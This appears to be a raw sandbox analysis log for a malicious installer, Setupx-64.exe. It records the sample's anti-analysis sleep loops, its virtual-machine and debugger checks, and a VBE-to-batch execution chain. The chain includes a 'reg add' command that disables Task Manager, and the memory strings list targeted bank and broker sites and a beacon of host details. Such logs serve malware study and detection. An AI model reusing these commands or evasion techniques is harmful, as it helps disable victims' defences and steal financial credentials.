            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -593062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -592812s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -592562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -592265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -591859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -591562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -591234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -590812s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -589703s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -589312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -589078s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -588750s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -588484s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -588203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -587920s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -587562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -586437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -586001s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -585656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -585453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -585140s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -584827s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -584468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -584307s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -584203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -584004s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -583703s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -583390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -583258s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -583154s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -583042s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -582935s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -582816s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -582701s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408Thread sleep time: -582593s >= -30000sJump to behavior
            Source: C:\Recovery\fontdrvhost.exe TID: 7996Thread sleep count: 364 > 30
            Source: C:\Recovery\fontdrvhost.exe TID: 5300Thread sleep count: 366 > 30
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 5716Thread sleep count: 367 > 30
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 6276Thread sleep count: 370 > 30
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Recovery\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_008BA5F4
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_008CB8E0
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008DAAA8 FindFirstFileExA,0_2_008DAAA8
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CDD72 VirtualQuery,GetSystemInfo,0_2_008CDD72
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599901Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598139Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595727Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 593281Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 593062Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592812Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 592265Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591859Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 591234Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 590812Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589703Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589312Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 589078Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588750Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588484Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 588203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 587920Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 587562Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 586437Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 586001Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585656Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585453Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 585140Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584827Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584468Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584307Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584203Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 584004Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583703Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583390Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583258Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583154Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 583042Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582935Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582816Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582701Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeThread delayed: delay time: 582593Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeThread delayed: delay time: 922337203685477
            Source: 55GejWrhvb.20.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Blockruntime.exe, 00000004.00000002.1392680175.000000001BF4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
            Source: Setupx-64.exe, 00000000.00000003.1327216666.00000000033B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
            Source: 55GejWrhvb.20.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 55GejWrhvb.20.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Blockruntime.exe, 00000004.00000002.1392546956.000000001BF22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: upfc.exe, 00000014.00000002.2677160450.000000001C3C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: Blockruntime.exe, 00000004.00000002.1392933439.000000001BF5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5t`
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 55GejWrhvb.20.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: wscript.exe, 00000001.00000003.1332481462.0000000003251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
            Source: 55GejWrhvb.20.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 55GejWrhvb.20.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 55GejWrhvb.20.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Blockruntime.exe, 00000004.00000002.1392546956.000000001BF22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
            Source: 55GejWrhvb.20.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 55GejWrhvb.20.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 55GejWrhvb.20.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 55GejWrhvb.20.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Setupx-64.exe, RZctPlhC2XmeDKsE7v.exe.4.dr, StartMenuExperienceHost.exe.4.dr, Blockruntime.exe.0.drBinary or memory string: x15VBGHGfs8fhuYXM0y
            Source: 55GejWrhvb.20.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 55GejWrhvb.20.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 55GejWrhvb.20.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 55GejWrhvb.20.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 55GejWrhvb.20.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 55GejWrhvb.20.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 55GejWrhvb.20.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 55GejWrhvb.20.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\Setupx-64.exeAPI call chain: ExitProcess graph end nodegraph_0-23731
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008D866F
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D753D mov eax, dword ptr fs:[00000030h]0_2_008D753D
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008DB710 GetProcessHeap,0_2_008DB710
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Recovery\fontdrvhost.exeProcess token adjusted: Debug
            Source: C:\Recovery\fontdrvhost.exeProcess token adjusted: Debug
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess token adjusted: Debug
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CF063 SetUnhandledExceptionFilter,0_2_008CF063
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008CF22B
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008D866F
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008CEF05
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Program Files (x86)\Google\Update\upfc.exe "C:\Program Files (x86)\google\Update\upfc.exe" Jump to behavior
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"156 ms"}}
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"235 ms"}}
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"156 ms"}}H;
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}UC
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}H;
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"158 ms"}}H;
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"235 ms"}}H;
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"158 ms"}}
